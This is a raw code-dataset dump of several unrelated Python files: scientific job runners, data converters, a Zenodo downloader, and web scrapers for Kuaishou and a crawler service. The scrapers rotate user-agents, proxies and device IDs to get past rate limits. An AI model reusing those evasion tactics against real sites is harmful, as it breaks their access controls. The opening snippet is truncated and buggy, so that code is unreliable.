range(n)]\n\nMAX = 0\n\nfor i in range(len(sorted(meets))):\n for j in range(len(sorted(meets[idx:]))):\n end = meets[i][1]\n start = meets[i+j][0]\n\n if end > start:\n continue\n elif end <= start+1:\n MAX+=1\n\n\nprint(meet)\n\n","sub_path":"boj_legacy/1931.py","file_name":"1931.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"329266504","text":"# coding: utf-8\n\nfrom __future__ import unicode_literals, division\nimport subprocess\nimport os\nimport shutil\nimport logging\n\nimport numpy as np\n\nfrom monty.shutil import decompress_dir\n\nfrom custodian.custodian import Job\n\n\n\"\"\"\nThis module implements basic kinds of jobs for FHI-aims runs.\n\"\"\"\n\n\nlogger = logging.getLogger(__name__)\n\n\n__author__ = \"Jan Kloppenburg\"\n__version__ = \"0.0.1\"\n__maintainer__ = \"jan Kloppenburg\"\n__email__ = \"jank@numphys.org\"\n__status__ = \"Beta\"\n__date__ = \"4Aug2019\"\n\nAIMS_INPUT_FILES = {'control.in', 'geometry.in'}\n\nAIMS_OUTPUT_FILES = ['geometry.in.next_step']\n\n\nclass AimsJob(Job):\n \"\"\"\n A basic job. Just runs whatever is in the directory. But conceivably\n can be a complex processing of inputs etc. with initialization.\n \"\"\"\n\n def __init__(self, aims_cmd, output_file=\"run\",\n stderr_file=\"std_err.txt\", suffix=\"\", final=True,\n backup=True, auto_continue=False):\n \"\"\"\n This constructor is necessarily complex due to the need for\n flexibility. For standard kinds of runs, it's often better to use one\n of the static constructors. The defaults are usually fine too.\n\n Args:\n aims_cmd (str): Command to run aims as a list of args. For example,\n if you are using mpirun, it can be something like\n [\"mpirun\", \"aims\"]\n output_file (str): Name of file to direct standard out to.\n Defaults to \"vasp.out\".\n stderr_file (str): Name of file to direct standard error to.\n Defaults to \"std_err.txt\".\n suffix (str): A suffix to be appended to the final output. E.g.,\n to rename all output from say s.out to\n s.out.relax1, provide \".relax1\" as the suffix.\n final (bool): Indicating whether this is the final job in a\n series. Defaults to True.\n backup (bool): Whether to backup the initial input files. If True,\n the control.in and geometry.in will be copied with a\n \".orig\" appended. Defaults to True.\n \"\"\"\n self.aims_cmd = aims_cmd\n self.output_file = output_file\n self.stderr_file = stderr_file\n self.final = final\n self.backup = backup\n self.suffix = suffix\n self.auto_continue = auto_continue\n\n def setup(self):\n \"\"\"\n Performs initial setup for AimsJob, including overriding any settings\n and backing up.\n \"\"\"\n decompress_dir('.')\n actions = []\n\n if self.backup:\n for f in AIMS_INPUT_FILES:\n shutil.copy(f, \"{}.orig\".format(f))\n\n return actions\n\n def run(self):\n \"\"\"\n Perform the actual run.\n\n Returns:\n (subprocess.Popen) Used for monitoring.\n \"\"\"\n cmd = list(self.aims_cmd)\n logger.info(\"Running {}\".format(\" \".join(cmd)))\n with open(self.output_file, 'w') as f_std, open(self.stderr_file, \"w\", buffering=1) as f_err:\n # use line buffering for stderr\n p = subprocess.Popen(cmd, stdout=f_std, stderr=f_err)\n return p\n\n def postprocess(self):\n \"\"\"\n Postprocessing includes renaming and gzipping where necessary.\n \"\"\"\n for f in AIMS_OUTPUT_FILES + [self.output_file]:\n if os.path.exists(f):\n if self.final and self.suffix != \"\":\n shutil.move(f, \"{}{}\".format(f, self.suffix))\n elif self.suffix != \"\":\n shutil.copy(f, \"{}{}\".format(f, self.suffix))\n\n # Remove continuation so if a subsequent job is run in\n # the same directory, will not restart this job.\n if os.path.exists(\"continue.json\"):\n os.remove(\"continue.json\")\n\n @classmethod\n def tddft_run(cls, aims_cmd):\n \"\"\"\n\n :param aims_cmd:\n :return:\n \"\"\"\n pass\n\n @classmethod\n def full_opt_run(cls, aims_cmd, converged_forces=0.01, max_steps=10, **aims_job_kwargs):\n \"\"\"\n Returns a generator of jobs for a full optimization run. Basically,\n this runs an infinite series of geometry optimization jobs until the\n structure is either below threshold or max_steps is reached.\n\n Args:\n aims_cmd (str): Command to run aims as a list of args. For example,\n if you are using mpirun, it can be something like\n [\"mpirun\", \"aims.VERSION.scalapack.mpi\"]\n max_steps (int): The maximum number of runs. Defaults to 10.\n\n **vasp_job_kwargs: Passthrough kwargs to AimsJob. See\n :class:`custodian.fhi_aims.jobs.AimsJob`.\n Returns:\n Generator of jobs.\n \"\"\"\n\n converged_forces = converged_forces\n\n pass\n\n def get_force(output_file='run'):\n \"\"\"\n Return the last force of the prievious run:\n\n :param output_file:\n File to parse\n\n :return:\n last computed total force\n \"\"\"\n max_forces = []\n\n with open(output_file, 'rt') as f:\n for line in f:\n if 'Maximum force component is' in line:\n max_forces.append(float(line.split()[4]))\n if 'Counterproductive step -> revert!' in line:\n max_forces = max_forces[:-1]\n\n return np.amin(max_forces)\n\n yield AimsJob(aims_cmd, final=False, suffix=\".relax%d\" % (i+1), **aims_job_kwargs)\n","sub_path":"custodian/fhi_aims/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":5558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"439585944","text":"# Autor: Oscar Macias Rodríguez\r\n# Descripción: Pregunta al usuario cuantos boletos quiere comprar para cada tipo de asiento e imprime el total a pagar.\r\n\r\n# Calcula el costo de los asientos A, B y C. Además, calcula la suma de los asientos indicados (A, B y C)\r\ndef calcularPago(numeroBoletosA, numeroBoletosB, numeroBoletosC):\r\n asientosA = numeroBoletosA * 925\r\n asientosB = numeroBoletosB * 775\r\n asientosC = numeroBoletosC * 360\r\n totalPago = asientosA + asientosB + asientosC\r\n return totalPago\r\n\r\n# Imprime en pantalla el costo total de los boletos.\r\ndef main():\r\n numeroBoletosA = int(input(\"Numero de boletos de clase A:\"))\r\n numeroBoletosB = int(input(\"Numero de boletos de clase B:\"))\r\n numeroBoletosC = int(input(\"Numero de boletos de clase C:\"))\r\n\r\n totalPago = calcularPago(numeroBoletosA, numeroBoletosB, numeroBoletosC)\r\n\r\n print(\"El costo total es:\", \"$%.2f\" % totalPago)\r\n\r\n\r\nmain()","sub_path":"Asientos en un estadio.py","file_name":"Asientos en un estadio.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"556848855","text":"# Author: Arthur Mensch\n# License: BSD\n# Adapted from nilearn example\nimport itertools\nimport os\nimport time\nfrom os.path import expanduser, join\n\nfrom nilearn.datasets import fetch_atlas_smith_2009\nfrom nilearn.image import index_img\nfrom nilearn.plotting import plot_stat_map\nfrom sklearn.externals.joblib import Parallel, delayed\n\nfrom modl.datasets.hcp import get_hcp_data\nfrom modl.spca_fmri import SpcaFmri\n\ntrace_folder = expanduser('~/output/modl/hcp')\n\ndef main():\n # Apply our decomposition estimator with reduction\n n_components = 70\n n_jobs = 1\n raw = True\n init = True\n\n mask, func_filenames = get_hcp_data(raw=raw)\n\n reduction_list = [1, 2, 4, 8, 12]\n alpha_list = [1e-2, 1e-3, 1e-4]\n\n Parallel(n_jobs=n_jobs, verbose=10)(delayed(run)(idx, reduction, alpha,\n mask, raw, n_components,\n init, func_filenames) for\n idx, (reduction, alpha)\n in enumerate(\n itertools.product(reduction_list, alpha_list)))\n\n\ndef run(idx, reduction, alpha, mask, raw, n_components, init, func_filenames):\n output_dir = join(trace_folder, 'experiment_%i' % idx)\n try:\n os.makedirs(output_dir)\n except OSError:\n pass\n dict_fact = SpcaFmri(mask=mask,\n smoothing_fwhm=3,\n batch_size=40,\n shelve=not raw,\n n_components=n_components,\n dict_init=fetch_atlas_smith_2009().rsn70 if\n init else None,\n reduction=reduction,\n alpha=alpha,\n random_state=0,\n n_epochs=2,\n l1_ratio=0.5,\n backend='c',\n memory=expanduser(\"~/nilearn_cache\"), memory_level=2,\n verbose=5,\n n_jobs=1,\n trace_folder=output_dir\n )\n\n print('[Example] Learning maps')\n t0 = time.time()\n dict_fact.fit(func_filenames, raw=raw)\n t1 = time.time() - t0\n print('[Example] Dumping results')\n # Decomposition estimator embeds their own masker\n masker = dict_fact.masker_\n components_img = masker.inverse_transform(dict_fact.components_)\n components_img.to_filename(join(output_dir, 'components_final.nii.gz'))\n print('[Example] Run in %.2f s' % t1)\n # Show components from both methods using 4D plotting tools\n import matplotlib.pyplot as plt\n from nilearn.plotting import plot_prob_atlas, show\n\n print('[Example] Displaying')\n fig, axes = plt.subplots(2, 1)\n plot_prob_atlas(components_img, view_type=\"filled_contours\",\n axes=axes[0])\n plot_stat_map(index_img(components_img, 0),\n axes=axes[1],\n colorbar=False,\n threshold=0)\n plt.savefig(join(output_dir, 'components.pdf'))\n show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"examples/experimental/fmri/hcp_compare.py","file_name":"hcp_compare.py","file_ext":"py","file_size_in_byte":3142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"465814902","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport json\nimport time\n\nfrom scrapy.utils.project import get_project_settings\nfrom pykafka import KafkaClient\nfrom loguru import logger\nfrom redis import Redis\n\nfrom KuaiShou.items import KuaishouUserInfoIterm\n\n\nclass KuaishouUserCountsSpider(scrapy.Spider):\n name = 'kuaishou_search_overview'\n # allowed_domains = ['live.kuaishou.com/m_graphql']\n # start_urls = ['http://live.kuaishou.com/m_graphql/']\n\n custom_settings = {'ITEM_PIPELINES': {\n 'KuaiShou.pipelines.KuaishouKafkaPipeline': 700,\n 'KuaiShou.pipelines.KuaishouScrapyLogsPipeline': 701\n }}\n settings = get_project_settings()\n # 连接redis\n redis_host = settings.get('REDIS_HOST')\n redis_port = settings.get('REDIS_PORT')\n redis_did_name = settings.get('REDIS_DID_NAME')\n redis_proxyip_name = settings.get('REDIS_PROXYIP_NAME')\n conn = Redis(host=redis_host, port=redis_port)\n\n kuaishou_url = 'http://live.kuaishou.com/m_graphql'\n search_overview_query = settings.get('SEARCH_OVERVIEW_QUERY')\n headers = {'content-type': 'application/json',\n 'Host': 'live.kuaishou.com',\n 'Origin': 'http://live.kuaishou.com'\n }\n\n def start_requests(self):\n # 配置kafka连接信息\n kafka_hosts = self.settings.get('KAFKA_HOSTS')\n kafka_topic = self.settings.get('KAFKA_USERINFO_SEEDS_TOPIC')\n logger.info('kafka info, hosts:{}, topic:{}'.format(kafka_hosts, kafka_topic))\n client = KafkaClient(hosts=kafka_hosts)\n topic = client.topics[kafka_topic]\n # 配置kafka消费信息\n consumer = topic.get_balanced_consumer(\n consumer_group=self.name,\n managed=True,\n auto_commit_enable=True\n )\n # 获取被消费数据的偏移量和消费内容\n for message in consumer:\n try:\n if message is None:\n continue\n # 信息分为message.offset, message.value\n msg_value = message.value.decode()\n msg_value_dict = eval(msg_value)\n if 'spider_name' not in list(msg_value_dict.keys()):\n logger.warning('Excloude key: spider_name, msg: {}'.format(msg_value))\n continue\n if msg_value_dict['spider_name'] != 'kuaishou_user_seeds':\n continue\n user_id = msg_value_dict['userId']\n self.headers['Referer'] = 'https://live.kuaishou.com/search/?keyword={}'.format(user_id)\n self.search_overview_query['variables']['keyword'] = '{}'.format(user_id)\n # logger.info(json.dumps(self.search_overview_query))\n # self.conn.incr('kwai_userInfo_offSetSize', 1)\n yield scrapy.Request(self.kuaishou_url, headers=self.headers,\n body=json.dumps(self.search_overview_query),\n method='POST',\n meta={'bodyJson': self.search_overview_query, 'msg_value_dict': msg_value_dict,\n 'retry_times': 0},\n callback=self.parse_search_overview, dont_filter=True\n )\n except Exception as e:\n logger.warning('Kafka message[{}] structure cannot be resolved :{}'.format(str(msg_value_dict), e))\n\n def parse_search_overview(self, response):\n try:\n rsp_search_overview_json = json.loads(response.text)\n except:\n # 处理在频率过快的时候 response.text = 你想干嘛?等情况\n logger.warning(response.text)\n rsp_search_overview_json = {'data': {'pcSearchOverview': None}}\n time.sleep(10)\n finally:\n logger.info(rsp_search_overview_json)\n pc_search_overview = rsp_search_overview_json['data']['pcSearchOverview']\n msg_value_dict = response.meta['msg_value_dict']\n search_overview_query = response.meta['bodyJson']\n current_retry_times = response.meta['retry_times'] + 1\n user_id = msg_value_dict['userId']\n if pc_search_overview == None:\n # 删掉did库中的失效did\n kuaishou_did_json = response.meta['Cookie']\n logger.info('RedisDid srem invaild did:{}'.format(str(kuaishou_did_json)))\n self.conn.zrem(self.redis_did_name, str(kuaishou_did_json).encode('utf-8'))\n # 再次尝试抓取,尝试3次\n logger.warning('userId: {}, pcSearchOverview authors list is None ! '.format(user_id))\n if current_retry_times > 3:\n return self.create_fail_items(user_id, -1)\n logger.warning(\n 'pcSearchOverview failed, result is None, userId: {}, retryTimes: {}'.format(user_id,\n current_retry_times))\n time.sleep(3)\n yield scrapy.Request(self.kuaishou_url, headers=self.headers, body=json.dumps(search_overview_query),\n method='POST',\n meta={'bodyJson': search_overview_query, 'msg_value_dict': msg_value_dict,\n 'retry_times': current_retry_times},\n callback=self.parse_search_overview, dont_filter=True\n )\n else:\n search_overview_list = pc_search_overview['list']\n for search_overview in search_overview_list:\n if search_overview['type'] != 'authors':\n continue\n search_overview_authors = search_overview['list']\n if search_overview_authors != []:\n author_info = search_overview_authors[0]\n yield self.create_sucess_items(user_id, author_info)\n break\n logger.warning('userId: {}, pcSearchOverview authors list is [] ! '.format(user_id))\n invaild_proxy = response.meta['proxy']\n logger.info('Proxy : %s is invaild ! Proxy sreming...' % invaild_proxy)\n self.conn.srem(self.redis_proxyip_name, str(invaild_proxy).encode('utf-8'))\n # 再次尝试抓取,尝试7次\n if current_retry_times > 3:\n yield self.create_fail_items(user_id, -2)\n break\n logger.warning(\n 'pcSearchOverview failed, result is None, userId: {}, retryTimes: {}'.format(user_id,\n current_retry_times))\n time.sleep(3)\n yield scrapy.Request(self.kuaishou_url, headers=self.headers, body=json.dumps(search_overview_query),\n method='POST',\n meta={'bodyJson': search_overview_query, 'msg_value_dict': msg_value_dict,\n 'retry_times': current_retry_times},\n callback=self.parse_search_overview, dont_filter=True\n )\n\n def create_fail_items(self, user_id, fail_type):\n kuaishou_user_info_iterm = KuaishouUserInfoIterm()\n kuaishou_user_info_iterm['spider_name'] = self.name\n kuaishou_user_info_iterm['is_successed'] = fail_type\n kuaishou_user_info_iterm['userId'] = user_id\n return kuaishou_user_info_iterm\n\n def create_sucess_items(self, user_id, author_info):\n kuaishou_user_info_iterm = KuaishouUserInfoIterm()\n logger.info('Search userinfo reslut: {}'.format(str(author_info)))\n kuaishou_user_info_iterm['spider_name'] = self.name\n kuaishou_user_info_iterm['userId'] = user_id\n kuaishou_user_info_iterm['principalId'] = author_info['id']\n kuaishou_user_info_iterm['nickname'] = author_info['name']\n kuaishou_user_info_iterm['avatar'] = author_info['avatar']\n kuaishou_user_info_iterm['sex'] = author_info['sex']\n kuaishou_user_info_iterm['description'] = author_info['description']\n kuaishou_user_info_iterm['fan'] = author_info['counts']['fan']\n kuaishou_user_info_iterm['follow'] = author_info['counts']['follow']\n kuaishou_user_info_iterm['photo'] = author_info['counts']['photo']\n kuaishou_user_info_iterm['is_successed'] = 1\n return kuaishou_user_info_iterm\n","sub_path":"TianShuData/online/KuaiShou/KuaiShou/spiders/kuaishou_search_overview.py","file_name":"kuaishou_search_overview.py","file_ext":"py","file_size_in_byte":8575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"293890539","text":"from tripod2.items.mungers.csv2mets.base import Tripod2MungerBase\nfrom tripod2.items import streams\nimport csv\nfrom django.conf import settings\n\n\n#CSV_FILE_NAME = '20151111_digguide_benjamin_rush_metadata.csv'\nCSV_FILE_NAME = '20160115_alex_harris_metadata.csv'\n\n\nPROPMAP = {\n\n 'Box_Number' : '',\n 'Print_Number' : '',\n 'Title' : '',\n 'Date' : '',\n 'DPC_ID' : '',\n 'Series' : '',\n 'ASpace_componentID' : '',\n 'Extent' : '',\n 'Creator' : '',\n 'Rights' : '',\n 'Spatial_Coverage' : '',\n 'Format' : '',\n 'Type' : '',\n 'IsPartOf' : '',\n\n}\n\n\nclass Tripod2Munger(Tripod2MungerBase):\n default_format = 'image'\n ownerid = 'docarts'\n collectionid = 'alexharris'\n shortid_offset = 11\n propmap = {}\n \n def handle_Spatial_Coverage(self, vals, newval):\n return self.handle_delimited_vals(vals, newval)\n\n def handle_Creator(self, vals, newval):\n return self.handle_delimited_vals(vals, newval)\n\n def handle_Subject(self, vals, newval):\n return self.handle_delimited_vals(vals, newval)\n\n def handle_Format(self, vals, newval):\n return self.handle_delimited_vals(vals, newval)\n\n def handle_item(self, rowdata):\n shortid = rowdata['DPC_ID']\n if shortid == '' or shortid is None:\n return\n\n dmr = self.get_dmr(rowdata)\n amr = self.get_amr(rowdata)\n args = {\n 'amr' : amr,\n 'dmr' : dmr,\n 'files' : self.filemap[shortid],\n 'owner' : self.owner,\n 'format' : 'slideshow',\n 'eadid' : self.collectionid,\n }\n mets = self.get_item_mets(shortid, **args)\n self.write_file(shortid, mets)\n\n \n def handle(self):\n filepath = settings.DATA_BASE_PATH + '/csv/' + CSV_FILE_NAME\n csvfile = open(filepath, 'rU')\n spamreader = csv.DictReader(csvfile)\n for row in spamreader:\n self.handle_item(row)\n\nif __name__ == '__main__':\n from tripod2.local import owners\n colid = __file__[:-3]\n m = Tripod2Munger(colid)\n m.handle()\n\n #import doctest\n #doctest.testmod(globs={'m':m, 'groupid' : groupid, 'owners' : owners})\n #m.handle()","sub_path":"local/mungers/csv2mets/alexharris.py","file_name":"alexharris.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"157820910","text":"\n\"\"\"\n分布式爬虫处理;包括取任务、执行任务、上报结果\n\"\"\"\n\nimport requests\nfrom requests.adapters import HTTPAdapter\nimport platform\nimport time\nimport json\nimport random\nimport logging\nimport gzip\nimport hashlib\nfrom datetime import datetime, timedelta\n\nAPI_URL = 'https://ohmyrss.com'\n\nDVC_ID = 'Github-Action'\nDVC_TYPE = 'robot'\nDVC_VER = '1.1.1'\nDVC_EXT = {\n 'pf': platform.platform(),\n 'sys': platform.system(),\n 'sysver': platform.version(),\n 'ver': DVC_VER,\n 'lat': '',\n 'lon': '',\n 'model': '',\n}\n\nUAS = [\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/74.0.835.163 Safari/535.1',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/78.0',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/13.0 Safari/534.50',\n 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/5.0)',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Edg/83.0.478.54',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1 (KHTML, like Gecko) Version/13.0.3 Safari/605.1',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0',\n 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1',\n 'Mozilla/5.0 (CrKey armv7l 1.5.16041) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.0 Safari/537.36',\n]\n\n\ndef md5(src):\n return hashlib.md5(src.encode('utf8')).hexdigest()\n\n\ndef current_hk_day():\n return (datetime.utcnow() + timedelta(hours=8)).strftime(\"%Y%m%d\")\n\n\ndef get_a_job():\n try:\n rsp = requests.post(API_URL + '/api/job/get', data={\n \"dvc_id\": DVC_ID,\n \"dvc_type\": DVC_TYPE,\n \"sign\": md5(f\"{DVC_ID}{DVC_TYPE}{current_hk_day()}\"),\n \"dvc_ext\": json.dumps(DVC_EXT),\n \"ver\": DVC_VER,\n }, timeout=30)\n\n if rsp.ok:\n return rsp.json()\n except:\n logging.warning(\"获取任务出现异常!\")\n\n return None\n\n\ndef handle_job(job):\n try:\n headers = {'User-Agent': random.choice(UAS), 'Referer': 'https://www.google.com'}\n rsp = requests.get(job['url'], headers=headers, timeout=30)\n\n if rsp.ok:\n job['rsp'] = rsp.text\n job['rsp_url'] = rsp.url\n return True\n else:\n logging.warning(f\"执行任务失败:`{job}`{rsp.status_code}\")\n except:\n logging.warning(f\"执行任务出现异常:`{job}\")\n\n return False\n\n\ndef giveback_job(job):\n try:\n rsp = requests.post(API_URL + '/api/job/giveback', data={\n \"id\": job['id'],\n \"url\": job['url'],\n }, timeout=30)\n\n if rsp.ok:\n return True\n else:\n logging.warning(f\"交还任务失败:`{job}\")\n except:\n logging.warning(f\"交还任务出现异常:`{job}\")\n\n return False\n\n\ndef finish_job(job):\n # 这里做两次重试,确保数据传输可靠性;并做请求体压缩\n s = requests.Session()\n s.mount('http://', HTTPAdapter(max_retries=2))\n s.mount('https://', HTTPAdapter(max_retries=2))\n\n try:\n body = json.dumps({\n \"id\": job['id'],\n \"url\": job['url'],\n \"rsp\": job['rsp'],\n \"rsp_url\": job['rsp_url'],\n })\n body = gzip.compress(bytes(body, 'utf8'))\n rsp = s.post(API_URL + '/api/job/finish', data=body, timeout=30, headers={'Content-Encoding': 'gzip'})\n\n if rsp.ok:\n logging.info(f\"任务执行成功:`{job['id']}`{job['url']}\")\n return True\n else:\n logging.warning(f\"结束任务失败:`{job['id']}`{job['url']}\")\n except:\n logging.warning(f\"结束任务出现异常:`{job['id']}`{job['url']}\")\n\n return False\n\n\n# 间隔时间,受服务器控制\nbusy_sleep = 5\nstart_ts = int(time.time())\n\n\nwhile True:\n if int(time.time()) - start_ts > 10*60:\n exit(0)\n\n job = get_a_job()\n\n if job is None:\n exit(0)\n else:\n if job.get('sleep'):\n busy_sleep = job['sleep'][0]\n\n # 开始处理,失败则交还\n if not handle_job(job):\n giveback_job(job)\n # 额外 sleep,等待任务被其他端认领\n time.sleep(busy_sleep)\n else:\n finish_job(job)\n\n time.sleep(busy_sleep)\n","sub_path":".github/workflows/mpwx_ga.py","file_name":"mpwx_ga.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"187686831","text":"def matching(*args, **kwargs):\n \"\"\"Download all open-access SXS files matching the input arguments\n\n Files will be output into subdirectories named for the SXS ID of each matching record found on\n Zenodo. For example, if the Zenodo record contains 'SXS:BBH:1234', the files will be placed\n into a subdirectory named 'SXS_BBH_1234'. If only the highest Lev is desired (the default), the\n files will be placed directly into that subdirectory; otherwise, additional levels of\n subdirectories will be created as needed.\n\n Parameters\n ==========\n file: string or multiple strings as non-keyword arguments\n Zenodo file name to match. This will be compiled as a regex, so it can include python-style\n regex matches or partial completions.\n sxs_ids: list of strings (defaults to ['SXS:BBH:'])\n Keyword argument only. SXS IDs to be searched for in the Zenodo deposit's title. Each will\n be compiled as a regex, so it can include python-style regex matches or partial completions.\n highest_lev_only: bool (defaults to True)\n Keyword argument only. If True, only download only files from the highest-numbered Lev.\n dry_run: bool (defaults to False)\n If True, don't actually download anything; just show what would be downloaded.\n\n \"\"\"\n import traceback\n import re\n import requests\n from .. import sxs_id as sxs_id_finder\n from .. import lev_regex\n from ..utilities import download\n from .api.records import Records\n from tqdm.autonotebook import tqdm\n\n file_name_matches = [re.compile(f) for f in args]\n sxs_id_matches = kwargs.pop('sxs_ids', ['SXS:BBH:'])\n if isinstance(sxs_id_matches, str):\n sxs_id_matches = [sxs_id_matches,]\n sxs_id_matches = [re.compile(i) for i in sxs_id_matches]\n highest_lev_only = kwargs.pop('highest_lev_only', True)\n lev_path_re = re.compile(lev_regex + r'/')\n dry_run = kwargs.pop('dry_run', False)\n\n def local_path(sxs_id, filename):\n \"\"\"Return the local filename where you want to save this file\"\"\"\n if not filename.startswith(sxs_id):\n filename = sxs_id + '/' + filename\n filename = filename.replace(':', '_')\n if highest_lev_only:\n filename = re.sub(lev_path_re, '', filename)\n return filename\n\n def title_matches(title):\n for sxs_id in sxs_id_matches:\n if sxs_id.search(title):\n return True\n return False\n\n def file_matches(file_name):\n for file_name_match in file_name_matches:\n if file_name_match.search(file_name):\n return True\n return False\n\n print('Retrieving all open-access records belonging to the \"sxs\" community on Zenodo.')\n all_records = Records.search(q='communities:sxs AND access_right:open')\n\n matching_records = [record for record in all_records if title_matches(record.get('metadata', {}).get('title', {}))]\n print('Retrieved {0} records in total, of which {1} have matching SXS IDs.'.format(len(all_records), len(matching_records)))\n\n for record in tqdm(matching_records):\n try: # We probably don't want this entire script to abort if something goes wrong with one record\n title = record['metadata']['title']\n sxs_id = sxs_id_finder(title)\n print('\\nWorking on \"{0}\"'.format(sxs_id))\n\n all_files = record['files']\n\n if highest_lev_only:\n files_to_download = {}\n for file_description in all_files:\n filename = file_description['filename']\n if file_matches(filename):\n search = lev_path_re.search(filename)\n if search:\n lev = search['lev']\n generic_filename = filename.replace('Lev{0}/'.format(lev), 'Lev{0}/')\n files_to_download[generic_filename] = files_to_download.get(generic_filename, []) + [lev,]\n else:\n files_to_download[filename] = ['']\n files_to_download = [key.format(max(files_to_download[key])) for key in files_to_download]\n files_to_download = [f for f in all_files if f['filename'] in files_to_download]\n else:\n files_to_download = [f for f in all_files if file_matches(f['filename'])]\n\n for file_description in files_to_download:\n url = file_description['links']['download']\n filename = file_description['filename']\n path = local_path(sxs_id, filename)\n print('\\tDownloading \"{0}\" to \"{1}\"'.format(filename, path))\n if not dry_run:\n download(url, path)\n\n except KeyboardInterrupt: # Don't catch Ctrl-C, so that interrupting this iteration will interrupt the entire loop\n raise\n\n except: # For anything else, just print the error, and continue\n traceback.print_exc()\n","sub_path":"sxs/zenodo/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":5031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"485179546","text":"import numpy as np\nimport pandas as pd\nimport datetime as dt\nfrom itertools import *\n\nstations_pd = pd.read_csv('/Volumes/GoogleDrive/My Drive/PhD (1)/2022_Winter/Dissertation_v13/South_America/Venezuela/Total_Stations_Venezuela_WL_v0.csv')\n\nIDs = stations_pd['SERIAL'].tolist()\nCOMIDs = stations_pd['COMID'].tolist()\nNames = stations_pd['ESTACION'].tolist()\n\n#Read in streamflow data\n\ndf = pd.read_csv(r'/Volumes/GoogleDrive/My Drive/PhD (1)/2020_Winter/Dissertation_v9/South_America/Venezuela/NIVEL.csv',encoding='unicode_escape')\n\nfor id, name, comid in zip(IDs, Names, COMIDs):\n\n\tprint(id, ' - ', name, ' - ', comid)\n\n\t# Get dataset for the current station\n\tid = int(id)\n\tdata = df[df['SERIAL'] == id]\n\n\t# Get years, months, and parameters from dataset\n\tYEARs = data['ANO'].tolist()\n\tMONTHs = data['MES'].tolist()\n\tPARAs = data['PARA'].tolist()\n\n\tdates = []\n\tvalues = []\n\tlong_months = [1, 3, 5, 7, 8, 10, 12]\n\tshort_months = [4, 6, 9, 11]\n\n\tfor year, month, para in zip(YEARs, MONTHs, PARAs):\n\t\t# Make a list of days depending on length of month\n\t\tif month in long_months: # 31 day month\n\t\t\tdays = list(range(1, 32))\n\t\telif month in short_months: # 30 day month\n\t\t\tdays = list(range(1, 31))\n\t\telif month == 2: # February\n\t\t\tyear = int(year)\n\t\t\tif year % 4 == 0: # Leap year, 29 days\n\t\t\t\tdays = list(range(1, 30))\n\t\t\telif year % 4 != 0: # Non leap year, 28 days\n\t\t\t\tdays = list(range(1, 29))\n\n\t\t# Add current month's dates to datetime list\n\t\tfor day in days:\n\t\t\tdates.append(dt.datetime(year, month, day))\n\n\t\t# Get dataset for just the current month and year\n\t\tyear = int(year)\n\t\tyear_df = data[data['ANO'] == year]\n\t\tmonth = int(month)\n\t\tmonth_df = year_df[year_df['MES'] == month]\n\n\t\t# Get a list of the streamflow values for the current month\n\t\tmonth_values = month_df.iloc[:, 5:len(days) + 5]\n\t\tmonth_values = month_values.replace(-1, np.NaN)\n\t\tmonth_values = month_values.values\n\n\t\t# Parameter conversion\n\t\tif para == 8150:\n\t\t\tmonth_values = month_values / 1000\n\t\telif para == 8155:\n\t\t\tmonth_values = month_values * 10\n\n\t\t# Add current month's data to list\n\t\tfor value in month_values:\n\t\t\tvalues.append(value)\n\n\t# Convert multi-dimensional list to 1D list\n\tvalues = chain.from_iterable(values)\n\n\t# Create dataframe from values and datetime lists, and export to .csv\n\tfinal_df = pd.DataFrame(values, index=dates, columns=['Water Level (cm)'])\n\tfinal_df.index.name = 'Datetime'\n\twhile np.isnan(final_df.iloc[:, 0].values[0]):\n\t\tfinal_df = final_df.iloc[1:]\n\twhile np.isnan(final_df.iloc[:, 0].values[len(final_df.iloc[:, 0].values) - 1]):\n\t\tfinal_df = final_df.iloc[:len(final_df.iloc[:, 0].values) - 2]\n\n\tdatesObservedDischarge = pd.date_range(final_df.index[0], final_df.index[len(final_df.index) - 1], freq='D')\n\tdf2 = pd.DataFrame(np.nan, index=datesObservedDischarge, columns=['Water Level (cm)'])\n\tdf2.index.name = 'Datetime'\n\n\t#print(df2)\n\n\tdf3 = df2.fillna(final_df)\n\n\t#print(df3)\n\n\tdf3.to_csv('/Volumes/GoogleDrive/My Drive/PhD 